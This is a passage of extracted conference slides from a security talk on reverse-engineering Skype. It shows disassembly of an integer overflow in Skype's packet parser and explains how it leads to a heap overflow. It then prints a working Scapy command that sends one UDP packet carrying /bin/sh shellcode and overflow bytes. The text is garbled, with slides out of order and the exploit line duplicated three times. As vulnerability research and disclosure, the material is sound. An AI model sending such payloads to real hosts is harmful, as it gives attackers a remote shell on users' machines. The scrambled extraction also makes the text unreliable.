Fabrice DESCLAUX Silver Needle in the Skype 88/98 . Philippe BIONDI. You are not Skype Inc: Build your own Skype Private Network Lure your victim into using your modified Skype version You can intercept and decrypt session keys Job’s done.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Skype Voice Interception Feasability of a man in the middle attack You are Skype Inc: You are the certificate authority You can intercept and decrypt session keys Job’s done.

Fabrice DESCLAUX Silver Needle in the Skype 89/98 . a l parse end edx . eax LocalAlloc ecx . [ e s p+a r g 4 ] ecx get uint esp . [ e s p+a r g 4 ] [ e s i +0Ch ] . [ e s p+a r g 4 ] eax . ds : 0 [ edx ∗ 4 ] eax [ e s i +10h ] . 0Ch al .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow Algorithm lea push call add test jz mov lea push mov call mov mov ecx . eax 1 Read an unsigned int NUM from the packet This integer is the number of unsigned int to read next malloc 4*NUM for storing those data 2 3 Philippe BIONDI.

4 cmp e s i . [ e s p+a r g 4 ] inc esi add ebp . 0Ch test al . Fabrice DESCLAUX Silver Needle in the Skype 90/98 . eax jb read int loop 1 For each NUM we read an unsigned int And we store it in the array freshly allocated 2 Philippe BIONDI. a l jz parse end mov eax .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow Algorithm read int loop : push ebx push edi push ebp call get uint add esp .

the multiplication by 4 will overflow : 0x80000010 × 4 = 0x00000040 So Skype will allocate 0x00000040 bytes But it will read NUM integers =⇒ Skype will overflow the heap Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 91/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow How to exploit that? If NUM = 0x80000010.

the exploit is possible © Philippe BIONDI. the overflow can smash function pointers And those functions are often called =⇒ Even on XP SP2.Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow Good exploit In theory. Fabrice DESCLAUX Silver Needle in the Skype 92/98 . exploiting a heap on Windows XP SP2 is not very stable But Skype has some Oriented Object parts It has some structures with functions pointers in the heap If the allocation of the heap is close from this structure.

Fabrice DESCLAUX Silver Needle in the Skype 93/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow Design of the exploits We need the array object to be decoded It only needs to be present in the object list to be decoded We can use a string object in the same packet to store the shellcode String objects are stored in a static place (almost too easy) Philippe BIONDI.

Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow The exploit: 1 UDP packet that comes from nowhere >>> send(IP(src="1.16.3.13.4".dst="172.2. Fabrice DESCLAUX Silver Needle in the Skype 94/98 .reqid=RandShort() val=Skype Encod(encod=0x41)/Skype Objects Set(objnb=2)/Skype Obj Str( val="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0a\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89 \x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh \x00"))/Skype Hdr(type=6)/Raw(vblen encode("\x10\x00\x00\x40AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\x80\x80\x80 \xfc\xff\xff\xff\xa4\xb0\x67\x08\xfc\xd3\x67\x08")))) Philippe BIONDI.dport=31337) /Skype SoF(id=RandShort())/Skype Enc()/Skype Cmd(cmd=14.37")/UDP(sport=1234.

2.3.37")/UDP(sport=1234.13.reqid=RandShort() val=Skype Encod(encod=0x41)/Skype Objects Set(objnb=2)/Skype Obj Str( val="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0a\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89 \x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh \x00"))/Skype Hdr(type=6)/Raw(vblen encode("\x10\x00\x00\x40AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\x80\x80\x80 \xfc\xff\xff\xff\xa4\xb0\x67\x08\xfc\xd3\x67\x08")))) Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 94/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow The exploit: 1 UDP packet that comes from nowhere >>> send(IP(src="1.4".dst="172.dport=31337) /Skype SoF(id=RandShort())/Skype Enc()/Skype Cmd(cmd=14.16.

reqid=RandShort() val=Skype Encod(encod=0x41)/Skype Objects Set(objnb=2)/Skype Obj Str( val="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0a\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89 \x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh \x00"))/Skype Hdr(type=6)/Raw(vblen encode("\x10\x00\x00\x40AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\x80\x80\x80 \xfc\xff\xff\xff\xa4\xb0\x67\x08\xfc\xd3\x67\x08")))) Philippe BIONDI.4".Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow The exploit: 1 UDP packet that comes from nowhere >>> send(IP(src="1.37")/UDP(sport=1234.2.dst="172.13.16.dport=31337) /Skype SoF(id=RandShort())/Skype Enc()/Skype Cmd(cmd=14. Fabrice DESCLAUX Silver Needle in the Skype 94/98 .3.

a the biggest botnet ever. . Philippe BIONDI. Fabrice DESCLAUX Silver Needle in the Skype 95/98 .Skype protections Skype seen from the network Advanced/diverted Skype functions Analysis of the login phase Playing with Skype Traffic Nice commands Heap overflow a. .k.

Lack of transparency. can’t be distinguished from data exfiltration Incompatible with traffic monitoring.Skype protections Skype seen from the network Advanced/diverted Skype functions Conclusion Good points Skype was made by clever people Good use of cryptography Bad points Hard to enforce a security policy with Skype Jams traffic. No way to know if there is/will be a backdoor Fully trusts anyone who speaks Skype. Fabrice DESCLAUX Silver Needle in the Skype 96/98 . Philippe BIONDI. IDS Impossible to protect from attacks (which would be obfuscated) Total blackbox.

. h Caution Never ever type /eggy prayer or /eggy indrek@mare. Fabrice DESCLAUX Silver Needle in the Skype 97/98 . .ee Those men who tried aren’t here to speak about what they saw. .Skype protections Skype seen from the network Advanced/diverted Skype functions Conclusion Ho. Philippe BIONDI. I almost forgot . .

org/projects/pytstop/ P. Python ipqueue.c Philippe BIONDI.secdev. RR0D: the Rasta Ring 0 Debugger http://rr0d. Scapy http://www. Fabrice DESCLAUX Silver Needle in the Skype 98/98 . http://woozle.org/projects/shellforge/ P.References References Neale Pickett. Shellforge http://www. Biondi. Desclaux.org/ P.droids-corp. Biondi. PytStop http://www.org/c/siringe.secdev. Siringe http://www. Biondi.org/~neale/src/ipqueue/ F.secdev.secdev.org/projects/scapy/ P. Biondi.

Sign up to vote on this title
UsefulNot useful